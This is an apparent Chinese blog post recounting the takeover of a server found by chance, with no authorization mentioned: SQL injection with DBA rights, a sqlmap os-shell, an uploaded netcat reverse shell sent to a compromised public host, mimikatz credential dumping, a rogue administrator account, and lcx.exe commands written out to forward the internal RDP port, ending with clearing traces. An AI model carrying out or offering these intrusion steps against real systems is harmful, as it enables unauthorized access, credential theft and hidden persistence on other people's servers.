通过注入拿下服务器

 

  首先,碰到了个站。注入漏洞,看一下是不是DBA权限。

通过注入拿下服务器_第1张图片

 

当前用户是DBA权限,执行os-shell

通过注入拿下服务器_第2张图片

 

 

 

可以直接执行命令,但是有时候会卡到链接超时,在执行os-shell的过程中有条信息,就是上面打红的地方(忽略掉打码技术),访问该地址它。

通过注入拿下服务器_第3张图片

 

 

 

能直接上传文件,上传NC,反弹shell(sqlmap里shell实在卡得不行,回显太慢)

 

 

 

上传成功,首先执行NC反弹shell到公网肉鸡里

 

在肉鸡里开启监听,接受到shell。

通过注入拿下服务器_第4张图片

 

没有公网地址,是内网机子。

通过注入拿下服务器_第5张图片

 

其次,mimikatz抓管理员密码。

通过注入拿下服务器_第6张图片

 

 

 

明文密码是抓不到的,抓到了哈希,拿去破解,破不出来。

算了,还是直接添加一个管理员账号吧。

看了一下端口,开了3389.

 

 

 

因为是内网机子,不能直接访问3389端口,这时就需要把内网的端口转发出来了。

用到的工具是lcx.exe

在公网上:lcx.exe -listen 2222 3333(公网监听2222端口,并把监听到的数据传到3333端口)

目标机:lcx.exe -slave xxx.xxx.xxx.xxx 2222 127.0.0.1 3389(把本地的3389端口转发到xxxx:2222公网端口)

 

通过注入拿下服务器_第7张图片

 

 

 

用刚才添加的用户远程登入。

通过注入拿下服务器_第8张图片

 

 

 

OK,成功链接。擦屁股走人

你可能感兴趣的:(渗透)